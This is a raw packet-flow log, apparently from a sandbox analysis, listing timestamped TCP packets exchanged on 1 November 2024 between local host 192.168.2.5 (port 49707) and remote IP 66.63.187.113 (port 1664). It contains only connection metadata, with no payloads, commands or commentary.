Nov 1, 2024 06:19:00.169698954 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169711113 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.169732094 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169814110 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.170450926 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.170516014 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.170548916 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.170581102 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.170597076 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.170615911 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.170627117 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.171293020 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.171355963 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.171360016 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338002920 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338061094 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338084936 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338119984 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338172913 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338188887 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338222027 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338258028 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338289976 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338303089 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338325024 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338356018 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338743925 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338797092 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338824034 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338833094 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.338872910 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.338896990 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339396000 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339430094 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339454889 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.339463949 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339497089 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339541912 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.339548111 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339581013 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339587927 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.339627981 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339662075 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.339709997 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341187954 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341238022 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341257095 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341288090 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341320038 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341353893 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341366053 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341387033 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341399908 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341422081 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341454983 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341486931 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341487885 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341521025 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341530085 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341555119 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341589928 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341594934 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.341624022 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341651917 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.341665030 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.482959032 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.507989883 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508027077 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508060932 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508111954 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508131981 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.508145094 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508169889 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.508179903 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508229971 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508239985 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.508264065 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508296967 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508306026 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.508827925 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508857012 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.508881092 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.508986950 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509018898 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509031057 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509053946 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509088039 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509102106 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509120941 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509174109 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509586096 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509618998 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509664059 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509670973 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509705067 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509754896 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509788036 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509794950 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509821892 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.509830952 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.509855986 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510011911 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.510540962 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510606050 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510639906 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510656118 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.510673046 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510706902 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510740042 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510752916 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.510773897 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510787010 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.510808945 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.510859966 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.511568069 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511619091 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511652946 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511667013 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.511687040 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511720896 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511754036 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511764050 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.511786938 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511792898 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.511823893 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.511878967 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.512521982 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512572050 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512605906 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512639999 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512645960 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.512672901 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512684107 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.512706041 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512738943 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512747049 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.512773037 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.512876987 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.513394117 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678563118 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678615093 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.678715944 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678745985 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678780079 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678813934 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678817987 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.678864002 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678865910 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.678896904 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678929090 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678944111 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.678961992 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.678997040 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679030895 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679037094 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679064035 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679074049 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679157019 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679192066 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679204941 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679240942 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679271936 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679285049 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679306984 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679426908 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679538965 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679595947 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679641008 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679660082 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679692984 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679725885 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679758072 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679763079 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679791927 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679814100 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679825068 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679858923 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679876089 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.679892063 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.679945946 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680129051 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680181026 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680232048 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680264950 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680269957 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680295944 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680305958 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680330038 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680418968 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680598974 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680648088 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680697918 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680711985 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680731058 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680763960 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680797100 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680808067 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680830956 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680840015 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680861950 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680895090 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680896997 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.680926085 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680960894 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.680969954 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681354046 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681396961 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681402922 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681437016 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681468964 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681509018 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681516886 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681549072 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681557894 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681581974 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681612968 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681644917 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681653023 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681675911 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681710005 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681720972 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681741953 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681746960 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.681778908 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.681891918 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.682343960 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682394028 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682426929 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682457924 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682466030 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.682492971 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682503939 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.682526112 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682562113 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682574034 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.682595015 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682626963 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682660103 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682662010 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.682693005 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.682699919 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.683439016 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.683509111 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.683520079 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848279953 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848337889 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848398924 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848411083 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848422050 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848445892 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848543882 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848589897 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848593950 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848628998 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848678112 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848679066 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848731995 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848764896 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848798037 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848809958 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848829985 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848843098 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848896027 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848938942 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.848944902 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.848978043 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849028111 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849075079 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849077940 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849108934 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849117994 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849142075 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849175930 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849195957 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849208117 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849257946 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849291086 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849309921 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849324942 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849344969 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849374056 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849402905 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849416971 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849456072 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849503994 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849522114 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849575043 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849623919 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849656105 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849688053 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849689960 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849719048 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849728107 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849776030 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849792957 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849823952 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849855900 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849873066 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849884987 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849932909 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.849958897 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.849965096 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850008965 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850014925 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850064039 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850095987 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850127935 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850138903 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850173950 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850177050 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850209951 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850243092 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850285053 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850291967 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850323915 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850332022 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850357056 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850385904 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850402117 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850419998 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850455046 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850486040 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850502968 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850519896 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850529909 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850548029 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850596905 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850630045 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850649118 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850662947 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850677967 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850694895 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850727081 CET	1664	49707	66.63.187.113	192.168.2.5
